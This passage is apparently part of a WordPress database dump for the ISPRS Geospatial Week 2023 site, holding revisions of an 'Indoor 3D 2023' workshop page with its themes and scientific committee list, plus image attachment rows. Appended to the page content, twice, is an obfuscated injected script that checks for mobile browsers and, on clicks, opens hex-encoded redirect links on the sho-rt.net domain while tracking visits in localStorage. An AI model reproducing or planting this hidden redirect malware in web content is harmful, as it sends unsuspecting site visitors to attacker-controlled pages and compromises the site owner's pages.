',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-autosave-v1','','','2022-10-09 05:18:35','2022-10-09 05:18:35','',2580,'https://gsw2023.com/?p=2728',0,'revision','',0),
(2731,1,'2022-10-12 23:03:51','2022-10-12 23:03:51','','12','','inherit','open','closed','','12','','','2022-10-12 23:03:51','2022-10-12 23:03:51','',0,'https://gsw2023.com/wp-content/uploads/2022/10/12.jpg',0,'attachment','image/jpeg',0),
(2732,1,'2022-10-12 23:21:42','2022-10-12 23:21:42','','11','','inherit','open','closed','','11','','','2022-10-12 23:21:42','2022-10-12 23:21:42','',0,'https://gsw2023.com/wp-content/uploads/2022/10/11.jpg',0,'attachment','image/jpeg',0),
(2733,1,'2022-10-12 23:27:22','2022-10-12 23:27:22','','A1','','inherit','open','closed','','a1','','','2022-10-12 23:27:22','2022-10-12 23:27:22','',0,'https://gsw2023.com/wp-content/uploads/2022/10/A1.jpg',0,'attachment','image/jpeg',0),
(2734,1,'2022-10-13 10:43:16','2022-10-13 10:43:16','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-13 10:43:16','2022-10-13 10:43:16','',2586,'https://gsw2023.com/?p=2734',0,'revision','',0),
